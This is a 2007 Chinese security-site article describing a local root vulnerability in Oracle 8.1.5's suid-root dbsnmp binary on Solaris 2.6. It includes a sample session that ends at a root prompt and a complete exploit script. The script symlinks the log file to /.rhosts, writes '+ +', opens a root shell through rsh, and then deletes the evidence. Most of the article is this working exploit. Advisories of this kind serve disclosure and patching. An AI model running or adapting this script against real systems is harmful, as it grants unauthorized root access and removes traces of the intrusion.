Oracle 8 严重漏洞

首页	安全动态	IT新闻	安全人物	本站动态	漏洞公告	病毒警报	木马预警
流氓软件	漏洞分析	入侵检测	升级补丁	安全配置	信道安全	设备安全	协议安全
WEB安全	病毒分析	木马研究	脚本注入	后门探讨	技术应用	数据安全	企业专区

收藏本站

设为首页



	会员登录：

站内搜索：新闻中心系统安全网络安全安全技术下载中心

Oracle 8 严重漏洞

作者：未知文章来源：fanqiang.chinaunix 点击数：更新时间：2007-8-30 1:08:12

综述：

　　Oracle 8.1.5 for UN*X存在普通用户可以得到root权限的漏洞。

　　检验环境：

　　Oracle 8.1.5 on Solaris 2.6 SPARC 版本。

　　漏洞详细描述：

　　如果没有设置ORACLE_HOME，运行dbsnmp（缺省设置suid root/sgid dba）时会在
当前目录下产生两个log文
件：dbsnmpc 和 dbsnmpt 。如果这两个文件不存在，dbsnmpd将会创建属性为666、大
小为400字节左右这两个文
件。如果这两个文件存在，dbsnmp将不改变此文件属性，并将400字节左右的输出内容
附加到这两个文件中。如
果root没有设置.rhosts文件，就可以通过创建一个/tmp/dbsnmpc 到 /.rhosts的符号
连接来得到root权限。

　　检验程序：

　　oracle8% uname -a; id
　　SunOS oracle8 5.6 Generic_105181-05 sun4u sparc
　　SUNW,Ultra-5_10
　　uid=102(btellier) gid=10(staff)
　　oracle8% /tmp/oracle.sh
　　couldn't read file "/config/nmiconf.tcl": no such file or directory
　　Failed to initialize nl component,error=462
　　Failed to initialize nl component,error=462
　　#
　　--- oracle.sh ---
　　#!/bin/sh
　　# Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others
　　# You'll probably have to change your path to dbsnmp
　　# Exploit will only work if /.rhosts does NOT exist
　　#
　　# Brock Tellier btellier@usa.net
　　cd /tmp
　　unset ORACLE_HOME
　　umask 0000
　　ln -s /.rhosts /tmp/dbsnmpc.log
　　/u01/app/oracle/product/8.1.5/bin/dbsnmp
　　echo "+ +" > /.rhosts
　　rsh -l root localhost 'sh -i'
　　rsh -l root localhost rm /tmp/*log*
　　rsh -l root localhost rm /.rhosts

文章录入：郝丽责任编辑：郝丽

上一篇文章：病毒漏报与误报

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

没有相关文章

站长邮箱：webmaster@anquan365.com

联系电话：86-10-67634029